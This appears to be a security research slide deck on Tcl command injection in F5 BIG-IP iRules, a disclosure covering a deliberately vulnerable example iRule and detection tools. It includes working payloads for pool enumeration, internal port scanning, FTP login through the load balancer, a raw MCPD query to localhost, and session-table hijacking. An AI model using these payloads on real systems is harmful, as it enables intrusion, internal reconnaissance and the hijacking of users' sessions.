Page 1: COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS
A story about how TCL interpretation works in F5 iRules and how it can be detected or exploited
Page 2: WHOAMI AND THANKS
Big thanks to my fellow researchers
▪ Jesper Blomström
▪ Pasi Saarinen
▪ William Söderberg
▪ Olle Segerdahl
Twitter @kuggofficial
Big thanks to David and Aaron at F5 SIRT for a good response: https://support.f5.com/csp/article/K15650046
Page 3: F-SECURE IS ONE OF THE LEADING CYBER SECURITY CONSULTING PROVIDERS GLOBALLY
CLIENTS: 250+ clients
THOUGHT LEADERSHIP: 300+ publications & research released annually
ACCREDITATIONS: 12 internationally recognised
CAPABILITY: 250+ technical consultants
TECHNICAL SECURITY SERVICES: Security assessments, Hardware security assessments, Red teaming, Incident Management & Forensics
RISK & SECURITY MANAGEMENT: Development programs, Audit & analysis, Coaching & exercises
CYBER INTELLIGENCE: Intelligence platform, Intelligence services
Page 4: LOAD BALANCERS
Page 5: THE F5 PRODUCTS I WILL TALK ABOUT
▪ Can store and handle multiple sessions for backend servers
▪ Customers write their own iRules to define the load balancer behaviour
▪ https://devcentral.f5.com is used as a "stackoverflow for iRules"
▪ Application fluency for all major protocols
▪ Highly programmable through iRules, iRules LX and Traffic Policies
▪ Deployable as software and hardware
▪ Scalable to Tb/s of performance and highly available for both data and control plane
▪ WAF functionality
(Diagram: Internet, TLS, BIG-IP Load balancer, HTTP Server 1, HTTP Server 2)
Page 6: CACHING IRULE EXAMPLE
(Sequence diagram: Browser, Loadbalancer, Backend webservers)
Browser -> Loadbalancer: GET /favicon.ico
Loadbalancer: iRule
Loadbalancer -> Browser: HTTP 200 OK
(The backend webservers are never contacted; the iRule answers the request itself.)
Page 7: FORWARDING EXAMPLE
(Sequence diagram: Browser, Loadbalancer, Backend webservers)
Browser -> Loadbalancer: GET /index.html
Loadbalancer: iRule
Loadbalancer -> Backend webservers: GET /index.html
Backend webservers -> Loadbalancer: HTTP 200 OK
Loadbalancer -> Browser: HTTP 200 OK
Page 8: THE IRULE LANGUAGE
▪ A fork of TCL 8.4
▪ New features in TCL >8.4 are not introduced in iRule
▪ iRule has introduced a group of simplifications and exceptions to TCL
▪ Return oriented programming (with optional exception handling)
Page 9: TCL / IRULE BASICS
▪ iRules determine where a given HTTP request is forwarded to, based on programmed logic
▪ The HTTP request header and body are parsed by the F5 iRule engine
▪ The system administrator writes F5 iRule code to handle requests
▪ Example "catch-all" redirect iRule:
when HTTP_REQUEST {
    HTTP::redirect "/helloworld.html"
}
Page 10: HOW TO SPOT THESE LOAD BALANCERS IN THE WILD
HTTP headers include:
▪ Server: BigIP
Found in redirects
Found in favicon.ico responses
(Both are responses the BIG-IP generates itself rather than passing through from a backend.)
Example response from the catch-all redirect iRule:
HTTP/1.0 302 Found
Location: /helloworld.html
Server: BigIP
Connection: close
Content-Type: Text/html
Content-Length: 0
Page 12: TCL SUPPORTS ARGUMENT SUBSTITUTION
Page 13: COMMAND ARGUMENTS
▪ A command line is evaluated by breaking it into words and substituting each word's value depending on how the word is enclosed
1. command "$arg1" "$arg2"   # Quoted arguments
2. command [$arg1] [$arg2]   # Bracketed arguments
3. command {$arg1} {$arg2}   # Braced arguments
4. command $arg1 $arg2       # Unquoted arguments
Page 14: QUOTED EVALUATION AND COMMAND SUBSTITUTION
Inside double quotes ("): "Command substitution, variable substitution, and backslash substitution are performed on the characters between the quotes ..."
Inside brackets []: "If a word contains an open bracket ("[") then TCL performs command substitution."
▪ Like backticks ` in /bin/sh
Page 15: THIS IS A COMMAND INJECTION
Bart: Is Al there?
Moe: Al?
Bart: Yeah, Al. Last name Caholic?
Moe: Hold on, I'll check. Phone call for Al... Al Caholic. Is there an Al Caholic here?
(The guys in the pub cheer.)
Page 16: ARGS AND BODY: UNQUOTED COMMAND SUBSTITUTION
command ?arg? ?body?
The ?body? argument of a command invocation is a script (a list of commands) that the command executes if a condition is met.
In the cases below the value of $body is evaluated as a script whether or not it was quoted; only braces around the body pass it through literally:
1. after 1 $body
2. while 1 $body
3. if 1 $body
4. switch 1 1 $body
Page 17: PRIOR ART: COMMAND INJECTION IN TCL 8.4
https://wiki.tcl-lang.org/page/Injection+Attack
TCL substitutes the value of a variable into the command line before the command runs if the word is inside double quotes:
set variable {This is a string}
catch "puts $variable"
When double quotes are used, TCL substitutes the contents of variables and commands. Try:
set variable {[error PWNED!]}
When the contents of $variable are substituted by TCL, the script puts [error PWNED!] is passed to catch, which evaluates it and thereby runs [error PWNED!]. This is called double substitution.
Page 18: BREAKING DOWN EXECUTION
1. The word catch is resolved as a command with a ?body? argument
2. Arguments are evaluated by the TCL interpreter according to the dodecalogue, including expansion of [ ], " " and { }
3. Any code inside the argument that starts with [ is then executed when catch evaluates its body
catch "puts $variable"       (first round: $variable is substituted into the quoted word)
puts [error PWNED!]          (the script catch receives and evaluates)
error PWNED!                 (second round: command substitution runs the payload)
Page 19: LIST OF BUILT-IN COMMANDS THAT CAN PERFORM COMMAND EVALUATION
▪ after
▪ catch
▪ eval
▪ expr
▪ for
▪ foreach
▪ history
▪ if
▪ proc
▪ cpu
▪ string match
▪ interp
▪ namespace eval
▪ namespace inscope
▪ source
▪ switch
▪ subst
▪ time
▪ try
▪ uplevel
▪ while
▪ trace
▪ list
Page 20: DIRECT EVALUATION: EVAL, SUBST OR EXPR
subst - Perform backslash, command, and variable substitutions.
subst ?-nobackslashes? ?-nocommands? ?-novariables? string
eval, a built-in Tcl command, interprets its arguments as a script, which it then evaluates.
eval arg ?arg ...?
expr, a built-in Tcl command, interprets its arguments as a mathematical expression, which it then evaluates.
expr arg ?arg ...?
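The following script is an added example and is not part of the slides: it pushes one attacker-controlled string through the argument forms of pages 13 to 20 (quoted, braced, ?body? arguments, and the direct evaluators catch, if, expr, subst and eval) so each substitution round can be watched. It uses core Tcl 8.4 syntax only and runs in tclsh, not on a BIG-IP; the input value is a constructed stand-in for a header such as [HTTP::header Accept-Language], and the "fired" check relies on the payload being exactly [error PWNED].

```tcl
#!/usr/bin/env tclsh
# Added example, not from the slides: the same attacker string pushed through
# the argument forms of pages 13-20, so each substitution round can be watched.
# Core Tcl 8.4 syntax only; runs in tclsh, no BIG-IP needed. The input is a
# constructed stand-in for a header such as [HTTP::header Accept-Language].

set input {en[error PWNED]}   ;# bracketed command hidden in a "language" value
set n     {1[error PWNED]}    ;# the same trick in a value that looks numeric

proc fired {code result} {
    # The payload is [error PWNED]: only an error whose message is exactly
    # PWNED proves the bracketed command itself ran, as opposed to a parse
    # complaint that merely quotes the input text back.
    return [expr {$code == 1 && [string equal $result "PWNED"]}]
}

proc report {label code result} {
    set verdict [expr {[fired $code $result] ? "INJECTED" : "not injected"}]
    puts [format "%-26s %-12s result: %s" $label $verdict $result]
}

# Round one only: an unquoted word substitutes $input as text. The brackets
# survive as ordinary characters, exactly like "set uri ..." in the HSSR iRule.
set uri http://$input.cdn.example.com/index.html
puts "uri after one round of substitution: $uri"

# Round two: a command that evaluates its argument as a script re-parses the
# substituted text, and [error PWNED] becomes a command substitution.
report {catch "puts $uri"}       [catch "puts $uri" r] $r
report {catch {puts $uri}}       [catch {puts $uri} r] $r

# ?body? arguments (page 16): if/while/after evaluate their body as a script.
set body $input
report {if 1 $body}              [catch {if 1 $body} r] $r
report {if 1 {puts $body}}       [catch {if 1 {puts $body}} r] $r

# Direct evaluators (page 20): expr re-substitutes an unbraced expression,
# subst substitutes by design, eval concatenates and evaluates its arguments.
report {expr "$n + 1"}           [catch {expr "$n + 1"} r] $r
report {expr {$n + 1}}           [catch {expr {$n + 1}} r] $r
report {subst $input}            [catch {subst $input} r] $r
report {eval puts $input}        [catch {eval puts $input} r] $r
report {eval [list puts $input]} [catch {eval [list puts $input]} r] $r

# Rule of thumb: let Tcl do exactly one round. Brace every ?body? and expr
# argument, build commands with list instead of string concatenation, and
# never hand a request value to eval or subst.
```

The braced expr case still fails, but with a non-numeric-operand error rather than PWNED: the value is used as data, never re-parsed. The list form is what makes eval safe, because list quotes the value into a single word before evaluation.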
Page 21: IRULE BASED ON HSSR
(Sequence diagram: Browser, Loadbalancer, Backend webservers)
Browser -> Loadbalancer: GET /index.html
Loadbalancer: iRule
Loadbalancer -> Backend webservers: GET /index.html
Backend webservers -> Loadbalancer: HTTP 200 OK
Loadbalancer -> Browser: HTTP 200 OK
when HTTP_REQUEST {
    if {[HTTP::uri] starts_with "/index.html"} {
        # Accept-Language is attacker-controlled and is used unvalidated
        set lang [HTTP::header {Accept-Language}]
        set uri http://$lang.cdn.example.com/index.html
        set status [call /Common/HSSR::http_req -uri $uri]
    }
}
Page 22: HOW HSSR USES OUR $URI
Page 23: EXPLOITATION
1. Identify an input field that is command substituted in the iRule
   Input Tcl strings in fields and header names
   Look for indications that the code was executed
2. Test the injection location using the info command
3. Identify external resources to pivot to permanent access
Page 24: DEMO TIME
Page 25: TAKING IT FURTHER
How do we get persistent access?
Page 26: GAINING PERMANENT ACCESS USING "TABLE"
▪ A session table is a distributed and replicated key-value store
▪ Commonly used to store cookie values
  Notably used to avoid paying for the APM module
▪ Magically synchronized between instances using load balancing
  Can be used to pivot access on multiple instances
Page 27: HACKING THE SESSION TABLE
▪ With command injection it's possible to overwrite any table value
▪ table set
▪ table lookup
▪ table add
▪ table replace
▪ Overwriting another user's session (or all sessions) makes it possible to execute code specifically for a target user
▪ Possible to sniff all http(s) traffic for any authenticated user
Page 28: TABLE DEMO: HOSTED MITM
Page 29: A LOOK AT THE CODE IN THE BIG-IP EDITOR
Page 30: POST EXPLOITATION POSSIBILITIES
▪ Scan internal network
▪ Scan localhost
▪ Attack internal resources using the BIG-IP F5 as a pivot
Page 31: PAYLOAD 1
Exposing the pool (backend) servers:
active_nodes -list [LB::server pool]
Page 32: PORTSCAN THE POOL SERVERS
set r ""                                   ;# so the response is defined even if no port is open
foreach p {21 80 135 389 443 445} {
    catch {
        set c [connect 192.168.200.5:$p]   ;# sideband connection from the BIG-IP to the pool server
        append r $p "\topen\n"
        close $c
    }
}
TCP::respond $r
Page 33: LOGGING IN TO THE FTP SERVICE
catch {
    set c [connect 192.168.200.5:21]
    recv -timeout 200 $c d                       ;# banner
    recv -timeout 200 $c d
    send -timeout 200 $c "USER anonymous\r"
    recv -timeout 200 $c d
    send -timeout 200 $c "PASS [email protected]\r"   ;# address as rendered on the page; a bracketed word in double quotes is itself command-substituted
    recv -timeout 200 $c d                       ;# expect: 230 User logged in.
}
close $c
TCP::respond $d
Page 34: ATTACK CHAIN
(Sequence diagram: Browser, Loadbalancer, Protected webservers)
Browser -> Loadbalancer: GET /index.html
Loadbalancer: iRule
Loadbalancer -> Protected webservers: FTP request
Protected webservers -> Loadbalancer: FTP response
Loadbalancer -> Browser: 230 User logged in.
Page 35: PAYLOAD 2: PORTSCAN LOCALHOST
Page 36: PAYLOAD 3: QUERY ALL MCPD SYSTEM MODULE
set c [connect 127.0.0.1:6666]   ;# mcpd on the BIG-IP itself
send $c {%00%00%00%16%00%00%00%3f%00%00%00%00%00%00%00%02%0b%65%00%0d%00%00%00%0c%21%e0%00%0d%00%00%00%02%00%00%00%00%00%00}
recv -timeout 10000 $c d
TCP::respond $d
Page 37: MCPD EXPLANATION
%00%00%00%16                     SIZE
%00%00%00%3f                     SEQUENCE
%00%00%00%00                     REQUEST-ID
%00%00%00%02                     FLAG
%0b%65                           KEY (Query All)
%00%0d                           TYPE
%00%00%00%0c                     ATTRIBUTE SIZE
%21%e0                           ATTRIBUTE NAME (System Module)
%00%0d%00%00%00%02%00%00%00%00   ATTRIBUTE DATA
%00%00                           END OF MESSAGE
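The following script is an added example, not part of the slides: it rebuilds the "query all System Module" message from the field breakdown above with binary format, checks it byte for byte against the payload on page 36, and decodes it again with binary scan, so every byte can be tied to its meaning. Field names and the header layout follow the slide; the 2-byte KEY, TYPE and ATTRIBUTE NAME codes are treated as opaque identifiers and the 10 attribute-data bytes are copied as-is, since the slide does not break them down further. It runs offline in tclsh and sends nothing to mcpd.

```tcl
#!/usr/bin/env tclsh
# Added example, not from the slides: build and decode the MCPD "query all
# System Module" message from the field layout on the MCPD EXPLANATION slide.
# Field names follow the slide; KEY/TYPE/ATTRIBUTE NAME are opaque 2-byte
# codes and the 10 attribute-data bytes are copied unchanged. Runs offline in
# tclsh (Tcl 8.4 syntax); nothing is sent to mcpd.

proc percent_to_bytes {s} {
    # The slide writes the payload in %xx notation; this yields the raw bytes
    # that actually go on the wire.
    return [binary format H* [string map {% ""} $s]]
}

proc to_hex {bytes} {
    binary scan $bytes H* h
    return $h
}

proc u16 {v} {
    # Render a 16-bit value read by binary scan S (signed) as 0xhhhh.
    return [format 0x%04x [expr {$v & 0xffff}]]
}

proc mcpd_attribute {name data} {
    # ATTRIBUTE SIZE covers the 2-byte ATTRIBUTE NAME plus the attribute data.
    set body [binary format S $name]$data
    return [binary format I [string length $body]]$body
}

proc mcpd_message {seq reqId flag key type attribute} {
    # Body: KEY, TYPE, the attribute, then the 2-byte END OF MESSAGE marker.
    set body [binary format SS $key $type]$attribute[binary format S 0]
    # Header: SIZE (bytes after the 16-byte header), SEQUENCE, REQUEST-ID,
    # FLAG, all 4-byte big-endian.
    return [binary format IIII [string length $body] $seq $reqId $flag]$body
}

proc mcpd_decode {msg} {
    # Walk the same layout back out of the bytes; returns name/value pairs.
    binary scan $msg IIIISSIS size seq reqId flag key type attrSize attrName
    set dataLen [expr {$attrSize - 2}]          ;# data = attribute size minus the 2-byte name
    binary scan $msg "@26H[expr {2 * $dataLen}]S" attrData eom
    return [list SIZE $size SEQUENCE $seq REQUEST-ID $reqId FLAG $flag \
        KEY [u16 $key] TYPE [u16 $type] ATTRIBUTE-SIZE $attrSize \
        ATTRIBUTE-NAME [u16 $attrName] ATTRIBUTE-DATA $attrData \
        END-OF-MESSAGE [u16 $eom]]
}

# Payload exactly as printed on the PAYLOAD 3 slide.
set slidePayload %00%00%00%16%00%00%00%3f%00%00%00%00%00%00%00%02%0b%65%00%0d%00%00%00%0c%21%e0%00%0d%00%00%00%02%00%00%00%00%00%00

# Rebuild it from its fields: sequence 0x3f, request-id 0, flag 2,
# key 0x0b65 (Query All), type 0x000d, attribute name 0x21e0 (System Module).
set attr [mcpd_attribute 0x21e0 [binary format H* 000d0000000200000000]]
set msg  [mcpd_message 0x3f 0 2 0x0b65 0x000d $attr]

if {[string equal [to_hex $msg] [to_hex [percent_to_bytes $slidePayload]]]} {
    puts "rebuilt message matches the slide payload ([string length $msg] bytes)"
} else {
    puts "MISMATCH: [to_hex $msg]"
}

foreach {name value} [mcpd_decode $msg] {
    puts [format "%-16s %s" $name $value]
}
```

The two length fields are what make the layout checkable: SIZE (0x16 = 22) is the byte count after the 16-byte header, and ATTRIBUTE SIZE (0x0c = 12) is the 2-byte name plus the 10 data bytes, which is why the script computes both from the bytes it has assembled instead of hard-coding them.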
Page 38: LIST USERS AND PRIVILEGES
Page 39: LIST LOCAL TMSH SHELL COMMANDS (BEYOND IRULE)
Page 40: ATTACK CHAIN
1. iRule injection access
2. Query MCPD
3. MCPD response
4. Execute MCPD tmsh command with Tcl injection
5. …
6. Local privileges
Page 41: DETECTION
Page 42: SCANNING FOR COMMAND INJECTION WITH TCLSCAN
▪ Automated tool to find quoted and unquoted arguments
▪ It's unmaintained Rust so I had to fix it
▪ Finds 80% of known injection vulnerabilities
▪ Get the code: https://github.com/kugg/tclscan
Page 43: AUTOMATED TESTING USING IRULEDETECTOR.PY
▪ Automated iRule injection detector scanner for Burp Suite
▪ The tool substitutes every available input field with a Tcl injection and measures the result
▪ Download iruledetector.py in the BApp Store
Page 44: UNIT TESTING IRULE CODE USING TESTCL
▪ Get the code: https://github.com/landro/testcl
▪ Unit testing framework for iRule code
▪ Community driven, lacks complex support
▪ I added cookie support
▪ Good for unit testing code and finding logical vulnerabilities
Page 45: SUMMARY
▪ Tcl is an old and loosely defined language
  Easy to fool
  Hard to get variable assignment and substitution right
▪ Avoid the use of eval, subst and expr
▪ Take care to use {bracing} of ?body? arguments
▪ Use iruledetector.py in Burp to find vulnerabilities
▪ Use tclscan to review code
▪ Use testcl to test your iRule logic
▪ Do manual third party code reviews
Page 46: THANK YOU
Page 47: ATTACK CHAIN (diagram)
(Sequence diagram: Browser, Loadbalancer with iRule, mcpd)
Browser -> Loadbalancer: 1. iRule injection (mcpd)
Loadbalancer (iRule) -> mcpd: 2. mcpd query
mcpd -> Loadbalancer (iRule): 3. mcpd response
Loadbalancer (iRule): 4. iRule with tmsh
Loadbalancer -> Browser: 5. Tcl shell response